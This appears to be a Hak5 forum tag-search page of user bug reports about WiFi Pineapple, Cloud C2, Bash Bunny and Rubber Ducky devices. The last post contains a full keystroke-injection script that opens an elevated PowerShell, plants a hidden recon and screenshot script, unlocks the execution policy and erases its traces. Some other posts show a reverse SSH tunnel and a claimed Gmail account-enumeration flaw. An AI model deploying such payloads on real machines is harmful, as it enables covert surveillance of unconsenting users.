Jump to content

Search the Community

Showing results for tags 'bug'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

  1. I was modifying theme CSS because, most of themes are just high-contrast single color and, yeah… anyways… Pretty straight forward. I was having some issues where PineAP in `Continuous` mode just ran and ran without displaying (or collecting) APs & Clients. Literally nothing. I rebooted a couple times to resolve this issue and it worked for the most part. I did notice constant 100% CPU when running PineAP or updating NMAP or whatever modules I had missing dependencies on. This is maybe the 20th time I've had to reset the damn thing because it always seems to be one thing or the other this with this specific device. Web GUI: Non Responsive SSH: CLI responds and I'm able to log in Route: ssh root@192.168.2.99:1471 (Per routing table I setup) root@Pineforest:/pineapple# route Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface default 192.168.2.1 0.0.0.0 UG 0 0 0 eth0 172.16.42.0 * 255.255.255.0 U 0 0 0 br-lan 192.168.2.0 * 255.255.255.0 U 0 0 0 eth0 eth0 Link encap:Ethernet HWaddr 00:13:37:XX:XX:XX inet addr:192.168.2.99 Bcast:192.168.2.255 Mask:255.255.255.0 inet6 addr: [xxxipv6Addrxxx]/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:11140 errors:0 dropped:868 overruns:0 frame:0 TX packets:2187 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:1129559 (1.0 MiB) TX bytes:331549 (323.7 KiB) Interrupt:5 ---- Steps ----- 1. I setup the Tetra to allow SSH & GUI over WAN and disabled the Management AP. 2. While I was on my iPad, I copied CSS from the Tetra to Koder (app). Changed some text styles and added a font. Copy+Paste to Pineapple. 3. Next thing I did was Run PineAP but I noticed that selecting "Both" (2.4 & 5ghz) would display the animated icon for 10 minutes and then the `Clients` table would appear with no entries. 4. No big deal, this happened before, I'll just reboot the Tetra via the Web GUI. ---- End Steps ----- Expected: The Tetra comes back and I can go about my day like I was able to prior to reboot (and every other time I've rebooted the Pineapple) Actual: The Tetra is now no longer available via the Web GUI on WAN and management AP is disabled so now I have to use the CLI. I have no idea what is wrong with this thing, it seems to run for a day or two before I'm knee deep in the support forums or googling the heck out of everything. The documentation seems either incomplete or unnecessarily vague and out of 10 times lacking the necessary steps to resolve issues. Super frustrated. :/
  2. So i'am hosting cloud c2 on a raspi 4 and when i try to connect via my Smartphone to the cloud i get the error message: "Your credentials are not valid." and the cloud crashes. I use the correct password and i dont know what the problem is. Thanks for your help.
  3. title says it all. was trying to get pineAP to snag my phone, but to no avail. after checking all my settings, i noticed that i had left the mac address list in "deny mode" okay, no problem. i just changed it to allow and tried again. the same thing happened again. i checked all of the settings again and saw that tge filter had gone back to deny. as a test, i switched it to allow, then refreshed the page. sure enough, it was back to deny. so my question is: how can i stop my filters from defaulting to deny?
  4. I configured C2 on my server and on my Pineapple Tetra. My Pineapple shows up in the C2 dashboard. However, each time I try to open and SSH connection, the terminal just says "Disconnected". Each time, C2 logs the following error: http: superfluous response.WriteHeader call from github.com/hak5/cc-server/api/web.httperror (handlers.go:1657) I've tried putting the "-sshport" on 2022 and on 443 (which was not otherwise in use). Each time, I've pushed the correct device.config file to my Pineapple and rebooted. Each time, I've made sure my Pineapple can indeed reach my C2 SSH port, by SSH'ing into my Pineapple and from there SSH'ing to the designated SSH port on my C2 server. This gives me the usual RSA fingerprint and "Are you sure you want to continue connecting (yes/no)?" so there shouldn't be any connection problems. Might this be a bug, or am I missing something?
  5. There's a hyperlink to the forum in the dialog box that pops up while installing modules. However, it's formatted with the local IP and port prepended. http://172.16.42.1:1471/“https://forums.hak5.org/forum/90-nano-tetra-modules/”
  6. I seem to have successfully stood up a C2 server (2.0.0 edition) and have connected a Lan Turtle to it. I can see the turtle in the dashboard, and the cc-client command appears to successfully connect (I spent a long time just getting to this point). When I try to light up an SSH connection from the browser, it doesn't work. From the browser's perspective it just looks like a timeout. From the turtle, I was able to capture a command that was executing: 1673 root 3616 SN {ssh} C2TERM -NR 22:localhost:22 XXXXX.YYYYY.cloudapp.azure.com -p 2022 This command executed for a little while on the turtle and then stopped. It certainly looks like a reverse SSH shell command, but why in the world is it assuming port 22 is open on the remote host (the -R option)? Of course it's not, and I'd venture to guess that's the reason this is failing. Is there any way to override that?
  7. I have discovered that the Javascript converter doesn't work properly with Firefox. While it seems to do the conversion properly, it won't let the user save the payload (the download box doesn't open). I tried it on both Windows and Linux, with and without add-ons enabled and it doesn't change anything. I checked the debug console and nothing seems to be out of the ordinary as it returns that everything is OK. I also checked with Chrome and there it works flawlessly. Too bad 'cause I want to avoid using Chrome. I tried it with Edge. Same problem as Firefox. And Internet Explorer... completely broken... but what was I to expect?
  8. Hello there, I'm experiencing constant Wifi Pineapple Crashes while running Deauth attacks against both 2,4 and 5GHz networks, even with having power adapter plugged in. Since I really need Pineapple right now during wireless networks audit - I'm asking for some help what to do about that bug, get it around. Also, during use of Beacon Response of PineAP I'm experiencing crashes. Device simply reboots itself. Is there any mean of troubleshooting that?
  9. Whenever I go into the Network tab and try to set a new MAC or Set Random MAC the radio that I try to change shuts off and becomes unusable. I have waited for them to become usable for up to 5 hours with no success, it doesn't matter if I do just one at a time or all of them, and doesn't matter how patient I am. And once this happens they are permanently unusable unless I preform a factory reset, which I've done several times. And I've also performed one Firmware Recovery, to no avail. Any ideas of what I can do?
  10. Hi there! I just updated the firmware of my tetra to 2.0.2 and the bug that i've found is still present in here: I realized first in 1.1.2 that "aircrack-ng -J output something.cap" is not working correct. Yes it generates the file, but hashcat can't read the key. This has to be a bug, because when I transfer the .cap file and run that command on two differend pcs, the generated .hccap file can be read successfully in hashcat. Aircrack-ng framework version is always 1.2 rc4. Greetings :)
  11. so, to send some files I want to send over discord, automatically using the rubber ducky, I need to press CMD SHIFT U. Problem is whenever I try and use the online compiler(https://ducktoolkit.com/encoder/) it won't work with all 3 buttons at once... it said to report it, so here's the report
  12. I have been troubleshooting issues with the bashbunny for as long as it has been available. I got mine as soon as it was released; and it has been nothing but problematic from day one; which is a shame. The device, in theory, is probably the best thing Hak5 has ever come out with; but it practice, it has been the least usable in my experience. Many payloads will not run consistently; if they run properly at all. Every payload that makes use of the USB partition (the one thing that should really allow us to accomplish truly amazing feats) is problematic for many of its customers. The bashbunny forum is littered with threads full of people who cannot get any credential payloads to work because USB writing fails; among other problems. Simple ducky payloads that execute fine on the ducky or on nethunter's duckhunter will not inject properly a fair percentage of the time on the bashbunny. I see mixed character case issues where they shouldn't be and other anomalies. I am really hoping the USB corruption issues and the bizarre injection problems I am having is due solely to the fact that I adopted so early and the rest of the devices are not plagued with these issues; as they make the device unusable. I am pleading with Hak5 support here to please provide me with a replacement. I and my friends have poured countless hours of time and ulcers into trying to get this device to work; with, very little and, no lasting success. Anything we get to to work once or twice is quickly broken by yet another USB corruption issue or other strange injection anomaly. Please help me. I have gone through every unbricking, reflashing, updating, and udisk reformatting operation that support has given and have tried every firmware available. Nothing seems to be able to salvage this bunny. Help me technolust-ken-obee. You're my only hope...
  13. I've had plug in USB Rubber ducky in the script starts running and all was okay. But after that i take some code insert it in the micro SD and I've had also plugged usb into my computer but suddenly red light turned on and script is not working. I changed the script, still red light and its still not working. I also tried to change the micro sd card, but still not working. My code: REM Open cmd GUI r STRING cmd ENTER STRING Hello World!!! encrypted to inject.bin PLEASE HELP ME
  14. I am unable to use scripts that open CMD as admin because phantom ENTER lines are bring executed after my "STRING cmd" lines in my ducky scripts. This is also happening other places. I have a workaround to get an admin prompt; but it is of no use because these ENTER keystrokes are bring entered in places where they should not be; and since they aren't actually in the script I cannot remove them. It may be that the end of line EOL character (LF in this case) is being interpreted as an ENTER keystroke. Is there anyway to convert all EOL characters in a file from LF or CRLF to some kind of NULL character so the Duckhunter HID conversion tool won't add in these ENTER keystrokes? Thanks to all who reply. This has been driving me nuts!
  15. Seb et al, I had my nano working great on my Samsung Note 4. Stopped working with it for maybe a year and during that time, I updated my phone to Samsung Galaxy 8 Edge. I downloaded the (most recent) wifi pineapple app from the Play Store. Followed the directions to connect and I am stuck at "Waiting for connection; Waiting for wifi pineapple to make a connection" USB tethering is on in my settings, I'm using the y cable to attach to power supply (blue light is on), they just aren't shaking hands. What can I do?
  16. I have this strange quacking behaviour: When i output to notepad, This line is quacking just fine: Q STRING ipconfig /all \> f:\\loot\\test.doc This line is not quacking at all: Q STRING ipconfig /all \> f:\\loot\\test.txt Is this a bug, or am I totally overlooking something? This is my simple test script: LED SETUP ATTACKMODE HID DUCKY_LANG no Q STRING ipconfig all \> f:\\loot\\test.doc Q ENTER Q STRING ipconfig all \> f:\\loot\\test.txt Q ENTER LED G 100 I am on version : 1.3_267 Any help would be greatly appreciated.
  17. I have minimized several infusions and now they will not come back to the interface. Configuration is one of them so I cannot factory reset the pineapple. Trying to SSH in fails with permission denied. Is there a fix for this issue? How can i restore the infusions so they are accessible?
  18. My friend bet me that I couldn't shut down his computer with my rubber ducky, so I decided to prove him wrong. I started writing my code to shutdown his laptop (he has a dual booting linux and windows setup), it works well in linux but in windows it opens start and types e in the search bar instead of going across to shutdown. I have tried "RIGHTARROW" and "RIGHT" and it is using US keyboard. Code: REM Linux Shutdown (needs root user to be logged in) DELAY 550 ALT F2 DELAY 600 STRING poweroff ENTER DELAY 500 REM Windows Shutdown GUI DELAY 250 RIGHT RIGHT ENTER
  19. Has anyone else tried to bind a socket on their BB using something like netcat or python -m SimpleHTTPServer. When connected to the BB through ssh (ecm_ethernet), commands that bind sockets take ~15 seconds to exectue When connected through serial, everything acts as normal. I made a github issue about it, but wasn't sure if that's the right place since that repo is for payloads - https://github.com/hak5/bashbunny-payloads/issues/57
  20. First of all I'm very new to Linux and ssh i setup mt wifi pineapple nano before installing the micro sd card I quickly found out that I was in desperate need for room so I installed the new card and formatted it with the GUI and rebooted system i could see the sad card mounted in the GUI and in the ssh but the module manager was always freeze after you install any program and try to go back in to the manager I saw another post that said the only way you could fix this bug was to do a factory reset after you've installed and formatted microSD card
  21. Sometimes you discovering a vulnerability when you don’t search for and sometimes finally like this, it’s simply a false alert. More than 70 percents of vulnerabilities I’ve found in my life have no rapport with a security research, but simply due to chance, when doing administrator tasks for example. This day, I decide for a customer that have millions of hit on this website because of a holiday game, to put the content of his website directly in memory for not having iops problems anymore. For doing this i simply use a ramdisk and i make a synchronization from disk (where is stored the code) to ramdisk each minute via rsync. This customers is on a lxc container with 8 GB RAM connected to a separate MySQL server by a private network. The webserver only use less than 1 GB of RAM and the applications less than 500 MB of disk space. So I just create a ramdisk like this : mkdir /home/ramdisk echo "shm /home/ramdisk tmpfs nodev,nosuid,noexec 0 0" >> /etc/fstab mount /home/ramdisk rsync -avz --stats --delete /home/xxxx /home/ramdisk/ After this, i am verifying with a simple df -h and i can see a big suprise : ~# df -h Filesystem Size Used Avail Use% Mounted on zfstore/zfs-containers/subvol-9202234-disk-1 32G 1.4G 31G 5% / none 492K 0 492K 0% /dev tmpfs 26G 68K 26G 1% /run tmpfs 5.0M 0 5.0M 0% /run/lock tmpfs 1.7G 0 1.7G 0% /run/shm shm 126G 410M 126G 1% /home/ramdisk My /home/ramdisk have a size of 126 G. Just after i verify with and without it, if ram seems used by this but the ram is exactly at the same state. Very excited to probably have found a new vulnerability, i am verifying on a new container on an other cluster and i can reproduce the problem with success. In the same time I am sending an email to a person i know that work on an implementation of this product and it is finally just a display problem : Privileged containers only fail to *show* the used memory (it’s an accounting issue), but after hitting the specified limits you’ll be writing to swap space instead, and ultimately the kernel’s OOM killer will kill the container before it starts using more RAM than assigned (note that both RAM and swap limits have to be hit). End of the story :) -- Christophe Casalegno https://twitter.com/Brain0verride
  22. FW-1.0.2 Sanity Check If you add a list of SSIDs to the PineAP Pool and then try to remove the 1st SSID from the list going down through the individual SSID remove feature it will remove the entire list and will not allow the list to be repopulated with the other SSIDs until you do a full Pool clear. How to reproduce: Manually add or allow PineAP to add more then 1 SSID to the PineAP Pool Select the first SSID in the list going down so that it is populated in the blow field for ADD/REMOVE Select to Remove the SSID and the entire list will be cleared You can re-ADD the selected SSID and remove it however the other SSIDs cannot be re-added until you select "Clear SSID Pool" from the SSID Pool Dropdown. Has anyone else run into this?
  23. hey, I'm encountring difficulties to install an infusion on my PineApple Mark V that running 2.2.0 firmware. -When i try to install an infusion from the PineApple Bar:Available, it needs to download the infusion on SD card. Why it can't install 11kb into 88kb free space? screenshot 1 -So i choose to download on SD card.=> screenshot 2 -It says the infusion is on sd card and it's installing in the web interface => screenshot 3 -When i check the PineApple Bar: Installed. => screenshot 4 I think it's a firmware bug. Can I fixe it by any commands? or should i flash my PineApple? Every Advices are wellcome =) You also can find me on IRC #pineapple
  24. I would like to share this one recent bug i found in gmail. It allows sending a list of about 200 email addresses and validates them if they exist in the google DB or not. This validator script is used by gmail while registering new users (ajax request is sent which shows whether entered email is available or not while user is filling up fields). Its simple XSS. Anyone can send a request containing multiple usernames and gmail replies with answer for every single of them whether it exists or not. Here is my oroginal post and description: http://vincian.blogspot.in/ http://vincian.tx0.org/links/gmail_email_validation.html Just thought of sharing it with hak5 :-)
  25. So, today, with a new problem. Every ducky script leads to the 'CTRL + ALT + DEL' screen. I originally thought it was just someones bad scripting, but it turns out everything does it, either at the beginning or half way through to script. ( Both Win7/8 tried on two Windows 7 comps and one Windows 8 ) One of the Win7 comps and the Win8 comp have NUM Keys. **Example Script** DELAY 3000 GUI r DELAY 750 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 ENTER ALT SPACE DELAY 100 STRING m DELAY 200 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime ENTER STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory ENTER STRING $date = get-date ENTER STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>" ENTER STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' ENTER STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" ENTER STRING $jpegSaveDir = New-Item $fileSaveDir'/Screenshots' -ItemType Directory ENTER STRING $displayInfo = Get-WmiObject Win32_DesktopMonitor | Where {$_.Name -eq 'Default Monitor'}| Select ScreenHeight, ScreenWidth ENTER STRING $displayWidth = $displayInfo.ScreenWidth ENTER STRING $displayHeight = $displayInfo.ScreenHeight ENTER STRING [system.Reflection.Assembly]::LoadWithPartialName("System.Drawing") ENTER STRING $x = 0 ENTER STRING do { Start-Sleep -Seconds 60 ENTER STRING $jpegName = (get-date).ToString('HHmmss') ENTER STRING $image = new-object System.Drawing.Bitmap 1366 ,768 ENTER STRING $imageSize = New-object System.Drawing.Size $displayWidth,$displayHeight ENTER STRING $screen = [system.Drawing.Graphics]::FromImage($image) ENTER STRING $screen.copyfromscreen(0,0,0,0, $imageSize,([system.Drawing.CopyPixelOperation]::SourceCopy)) ENTER STRING $image.Save("$jpegSaveDir/$jpegName.jpeg",([system.drawing.imaging.imageformat]::jpeg)); ENTER STRING $x++ } while ($x -ne 1); ENTER STRING $Report >> $fileSaveDir'/ComputerInfo.html' ENTER STRING function copy-ToZip($fileSaveDir){ ENTER STRING $srcdir = $fileSaveDir ENTER STRING $zipFile = '/public\Report.zip' ENTER STRING if(-not (test-path($zipFile))) { ENTER STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) ENTER STRING (dir $zipFile).IsReadOnly = $false} ENTER STRING $shellApplication = new-object -com shell.application ENTER STRING $zipPackage = $shellApplication.NameSpace($zipFile) ENTER STRING $files = Get-ChildItem -Path $srcdir ENTER STRING foreach($file in $files) { ENTER STRING $zipPackage.CopyHere($file.FullName) ENTER STRING while($zipPackage.Items().Item($file.name) -eq $null){ ENTER STRING Start-sleep -seconds 1 }}} ENTER STRING copy-ToZip($fileSaveDir) ENTER STRING remove-item $fileSaveDir -recurse ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL S DELAY 1500 STRING C:\Windows\config.ps1 ENTER DELAY 2000 ALT F4 DELAY 200 GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 100 STRING m DELAY 200 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 1000 STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1 ENTER **** I just don't know what to do anymore. Someone help. The scripts came from online. I've tried saving the .bin file on multiple computers, so it's not that. I hope Darren sees this and helps me.. I just don't know what to do, I've tried everything. EDIT:: I've also tried the simple " Hello world " script, same result.
×
×
  • Create New...